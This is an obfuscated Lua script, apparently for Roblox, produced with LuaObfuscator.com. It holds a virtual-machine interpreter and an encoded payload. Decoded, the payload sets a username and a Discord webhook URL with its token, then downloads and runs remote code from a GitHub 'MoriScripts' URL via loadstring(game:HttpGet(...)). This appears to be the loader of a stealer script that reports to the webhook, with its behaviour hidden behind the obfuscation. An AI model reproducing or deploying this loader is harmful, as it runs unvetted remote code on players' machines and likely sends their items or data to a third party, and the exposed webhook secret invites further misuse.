--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32=0 -0 ;local v33;local v34;while true do if (v32==1) then return (v34 * ((1300 -(367 + 201)) -476)) + v33 ;end if (v32==(0 -0)) then v33,v34=v1(v16,v19,v19 + (4 -2) );v19=v19 + (621 -(555 + 64)) ;v32=932 -(857 + 74) ;end end end v18=3;end if (v18==4) then function v25()local v35=v24();local v36=v24();local v37=1 -0 ;local v38=(v21(v36,928 -(214 + 713) ,20) * ((1 + 1)^((75 -51) + 2 + 6))) + v35 ;local v39=v21(v36,51 -30 ,5 + (46 -20) );local v40=((v21(v36,909 -(282 + 595) )==(1638 -(1523 + 114 + 0))) and  -(1 + 0)) or (2 -1) ;if (v39==(0 -(18 -(10 + 8)))) then if (v38==(1065 -(68 + 997))) then return v40 * (1270 -(226 + 1044)) ;else v39=4 -3 ;v37=(450 -333) -(32 + 85) ;end elseif (v39==((3486 -(416 + 26)) -(915 + 82))) then return ((v38==(0 + 0)) and (v40 * ((1 + 0)/(0 + (0 -0))))) or (v40 * NaN) ;end return v8(v40,v39-((2771 -(368 + 423)) -(892 + 65)) ) * (v37 + (v38/((4 -2)^(95 -43)))) ;end v26=nil;function v26(v41)local v42;if  not v41 then local v82=0 + 0 ;while true do if (v82==((1486 -(998 + 488)) -0)) then v41=v24();if (v41==(438 -(47 + 98 + 293))) then return "";end break;end end end v42=v3(v16,v19,(v19 + v41) -(431 -(44 + 386)) );v19=v19 + v41 ;local v43={};for v66=1, #v42 do v43[v66]=v2(v1(v3(v42,v66,v66)));end return v6(v43);end v18=5;end if (v18==6) then v29=nil;function v29()local v44=1002 -(241 + 761) ;local v45;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v44==(0 + 0)) then v45=0;v46=nil;v44=1;end if ((1 + 1)==v44) then v49=nil;v50=nil;v44=9 -6 ;end if (v44~=(9 -6)) then else v51=nil;while true do local v88=374 -(123 + 251) ;while true do if (v88~=0) then else if (v45~=0) then else local v96=0 -0 ;while true do if (v96==(699 -(208 + 490))) then v48={};v45=1;break;end if (v96==0) then local v100=0 + 0 ;while true do if (v100==0) then v46={};v47={};v100=1;end if (v100~=(1 + 0)) then else v96=1;break;end end end end end if (v45==(837 -(660 + 176))) then local v97=0 + 0 ;while true do if (v97==0) then v49={v46,v47,nil,v48};v50=v24();v97=1 + 0 ;end if (v97==(1 + 0)) then v51={};v45=2 + 0 ;break;end end end v88=1 -0 ;end if (1==v88) then if ((4 -1)==v45) then local v98=0;while true do if (v98~=(0 -0)) then else for v102=1 + 0 ,v24() do v47[v102-1 ]=v29();end return v49;end end end if (v45~=(2 + 0)) then else local v99=396 -(115 + 281) ;while true do if (1==v99) then for v104=2 -1 ,v24() do local v105=0 + 0 ;local v106;local v107;local v108;while true do if (v105~=(2 -1)) then else v108=nil;while true do if (v106~=0) then else local v158=0;while true do if (v158==(0 -0)) then v107=0;v108=nil;v158=1;end if (v158==(868 -(550 + 317))) then v106=1 -0 ;break;end end end if (v106~=(1 -0)) then else while true do if (v107==(0 -0)) then v108=v22();if (v21(v108,1,286 -(134 + 151) )==(1665 -(970 + 695))) then local v166=0;local v167;local v168;local v169;local v170;while true do if (v166==(3 -1)) then while true do if (v167==(1992 -(582 + 1408))) then local v173=0;while true do if (v173~=1) then else v167=10 -7 ;break;end if (v173==(0 -0)) then if (v21(v169,3 -2 ,1)~=1) then else v170[1826 -(1195 + 629) ]=v51[v170[2]];end if (v21(v169,2,2 -0 )==1) then v170[244 -(187 + 54) ]=v51[v170[3]];end v173=1;end end end if (v167==3) then if (v21(v169,783 -(162 + 618) ,3)==(1 + 0)) then v170[4]=v51[v170[3 + 1 ]];end v46[v104]=v170;break;end if (v167==0) then local v175=0 -0 ;while true do if ((1 -0)~=v175) then else v167=1 + 0 ;break;end if (v175==0) then v168=v21(v108,2,3);v169=v21(v108,1640 -(1373 + 263) ,1006 -(451 + 549) );v175=1;end end end if (v167==1) then v170={v23(),v23(),nil,nil};if (v168==(0 -0)) then local v178=0;local v179;local v180;while true do if (v178==1) then while true do if (v179~=(1384 -(746 + 638))) then else v180=0;while true do if (v180~=0) then else v170[3]=v23();v170[2 + 2 ]=v23();break;end end break;end end break;end if (v178==(0 -0)) then v179=341 -(218 + 123) ;v180=nil;v178=1;end end elseif (v168==(1582 -(1535 + 46))) then v170[3]=v24();elseif (v168==(2 + 0)) then v170[3]=v24() -(2^(3 + 13)) ;elseif (v168~=(563 -(306 + 254))) then else local v187=0 + 0 ;local v188;local v189;while true do if (v187~=(0 -0)) then else v188=1467 -(899 + 568) ;v189=nil;v187=1 + 0 ;end if (v187~=1) then else while true do if (v188==(0 -0)) then v189=603 -(268 + 335) ;while true do if (v189~=(290 -(60 + 230))) then else v170[3]=v24() -(2^(588 -(426 + 146))) ;v170[1 + 3 ]=v23();break;end end break;end end break;end end end v167=1458 -(282 + 1174) ;end end break;end if (v166~=(812 -(569 + 242))) then else local v171=0 -0 ;while true do if (v171==0) then v169=nil;v170=nil;v171=1 + 0 ;end if (1~=v171) then else v166=1026 -(706 + 318) ;break;end end end if (v166~=(1251 -(721 + 530))) then else local v172=1271 -(945 + 326) ;while true do if (v172==(0 -0)) then v167=0;v168=nil;v172=1 + 0 ;end if (v172~=(701 -(271 + 429))) then else v166=1 + 0 ;break;end end end end end break;end end break;end end break;end if (v105~=(1500 -(1408 + 92))) then else v106=0;v107=nil;v105=1;end end end v45=3;break;end if (0==v99) then for v109=1,v50 do local v110=0;local v111;local v112;local v113;while true do if (v110==(1087 -(461 + 625))) then v113=nil;while true do if (v111==(1288 -(993 + 295))) then v112=v22();v113=nil;v111=1;end if (v111==1) then if (v112==1) then v113=v22()~=(0 + 0) ;elseif (v112==2) then v113=v25();elseif (v112==(1174 -(418 + 753))) then v113=v26();end v51[v109]=v113;break;end end break;end if (v110==(0 + 0)) then v111=0 + 0 ;v112=nil;v110=1 + 0 ;end end end v49[3]=v22();v99=1 + 0 ;end end end break;end end end break;end if (1~=v44) then else v47=nil;v48=nil;v44=531 -(406 + 123) ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v52)if (v1(v52,2)==79) then v20=v0(v3(v52,1,1));return "";else local v83=v2(v0(v52,16));if v20 then local v89=v5(v83,v20);v20=nil;return v89;else return v83;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v53,v54,v55,v56=v1(v16,v19,v19 + 3 );v19=v19 + (1773 -(1749 + 20)) ;return (v56 * 16777216) + (v55 * (15567 + 49969)) + (v54 * ((563 + 1015) -(1249 + 73))) + v53 ;end v25=nil;v18=4;end if (v18==7) then function v30(v57,v58,v59)local v60=v57[1];local v61=v57[2];local v62=v57[3];return function(...)local v68=v60;local v69=v61;local v70=v62;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v84=0,v76 do if (v84>=v70) then v74[v84-v70 ]=v75[v84 + 1 ];else v78[v84]=v75[v84 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v85=0;while true do if (v85==1) then if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81==0) then v72=v80[3];else do return;end end elseif (v81<=2) then v78[v80[2]]();elseif (v81>3) then local v128=0;local v129;local v130;local v131;local v132;while true do if (v128==1) then v73=(v131 + v129) -1 ;v132=0;v128=2;end if (2==v128) then for v160=v129,v73 do local v161=0;while true do if (v161==0) then v132=v132 + 1 ;v78[v160]=v130[v132];break;end end end break;end if (v128==0) then v129=v80[2];v130,v131=v71(v78[v129](v13(v78,v129 + 1 ,v80[3])));v128=1;end end else local v133=v80[2];local v134=v78[v80[3]];v78[v133 + 1 ]=v134;v78[v133]=v134[v80[4]];end elseif (v81<=7) then if (v81<=5) then local v115=v80[2];local v116=v78[v80[3]];v78[v115 + 1 ]=v116;v78[v115]=v116[v80[4]];elseif (v81==6) then v59[v80[3]]=v78[v80[2]];else v78[v80[2]]=v59[v80[3]];end elseif (v81<=8) then v78[v80[2]]=v59[v80[3]];elseif (v81==9) then v72=v80[3];elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=15) then if (v81<=12) then if (v81==11) then v78[v80[2]]();else v59[v80[3]]=v78[v80[2]];end elseif (v81<=13) then v78[v80[2]]=v80[3]~=0 ;elseif (v81>14) then local v143=v80[2];v78[v143]=v78[v143](v13(v78,v143 + 1 ,v73));elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=18) then if (v81<=16) then v78[v80[2]]=v80[3];elseif (v81>17) then local v145=v80[2];local v146,v147=v71(v78[v145](v13(v78,v145 + 1 ,v80[3])));v73=(v147 + v145) -1 ;local v148=0;for v153=v145,v73 do local v154=0;while true do if (v154==0) then v148=v148 + 1 ;v78[v153]=v146[v148];break;end end end else do return;end end elseif (v81<=19) then v78[v80[2]]=v80[3]~=0 ;elseif (v81>20) then local v149=v80[2];v78[v149]=v78[v149](v13(v78,v149 + 1 ,v73));else v78[v80[2]]=v80[3];end v72=v72 + 1 ;break;end if (0==v85) then v80=v68[v72];v81=v80[1];v85=1;end end end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v63,v64,v65)if v65 then local v86=(v63/((5 -(169 -(122 + 44)))^(v64-(1146 -(466 + (1172 -493))))))%((4 -2)^(((v65-((333 -218) -(4 + 110))) -(v64-(2 -1))) + (1901 -(106 + 1794)))) ;return v86-(v86%(1 + 0)) ;else local v87=((3 -2) + 1)^(v64-1) ;return (((v63%(v87 + v87))>=v87) and 1) or (0 -0) ;end end v22=nil;v18=2;end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203093O0059616E6B3132333432030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130383930323433372O3138313438363136302F44772D5F383643677147763530717A444E786B63794A71514C5164306D375F707673592O70427A6D6E58667351585A4D4E4761742O59437935675A426669584F3961707900173O0012143O00013O00260E3O000E000100020004093O000E0001001214000100043O001206000100033O001208000100053O001208000200063O002005000200020007001214000400084O000D000500014O0004000200054O000F00013O00022O00020001000100010004093O0016000100260E3O0001000100010004093O00010001001214000100043O001206000100093O0012140001000B3O0012060001000A3O0012143O00023O0004093O000100012O00013O00017O00",v9(),...);
